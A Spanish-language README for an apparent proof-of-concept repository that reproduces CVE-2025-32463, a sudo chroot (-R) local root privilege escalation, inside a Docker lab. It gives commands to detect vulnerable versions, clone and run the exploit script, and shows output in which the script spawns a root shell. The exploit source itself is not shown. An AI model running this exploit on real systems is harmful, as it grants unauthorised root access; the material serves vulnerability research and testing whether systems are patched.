
Escalada de privilegios a root a través del binario sudo con la opción chroot. CVE-2025-32463
Este repositorio proporciona un entorno mínimo y reproducible para demostrar la falla de escalada de privilegios CVE‑2025‑32463 en la característica chroot de sudo.
Las compilaciones vulnerables de sudo 1.9.14 hasta 1.9.17 (todas las p‑revisiones) en la mayoría de las distribuciones de Linux se ven afectadas.
Páginas de seguridad
| Archivo | Propósito |
|---|---|
| Dockerfile | Construye una imagen de Ubuntu 24.04 con sudo 1.9.16p2 vulnerable y herramientas de compilación |
| sudo‑chwoot.sh | Exploit de prueba de concepto que genera un shell root dentro del chroot |
# Vulnerable sudo
pwn ~ $ sudo -R woot woot
sudo: woot: No such file or directory
# Patched sudo
pwn ~ $ sudo -R woot woot
[sudo] password for pwn:
sudo: you are not permitted to use the -R option with woot
# 1 – clone repo
$ git clone https://github.com/pr0v3rbs/CVE-2025-32463_chwoot.git
$ cd CVE-2025-32463_chwoot
# 2 – build and run Docker image (tagged "sudo-chwoot")
$ ./run.sh
# 3 – run exploit in container (runs root command directly or drops you into a root shell)
pwn@f722d9182d1f:~$ ./sudo-chwoot.sh id
woot!
uid=0(root) gid=0(root) groups=0(root),1001(pwn)
pwn@f722d9182d1f:~$ ./sudo-chwoot.sh
woot!
root@f722d9182d1f:/# id
uid=0(root) gid=0(root) groups=0(root),1001(pwn)
root@f722d9182d1f:/#
run.sh pasa --privileged y --rm a Docker para que el contenedor se limpie solo al salir.
Elimina la imagen cuando hayas terminado:
docker rmi sudo-chwoot
| run.sh |
| Script auxiliar que construye la imagen (si es necesario) y lanza el contenedor del exploit |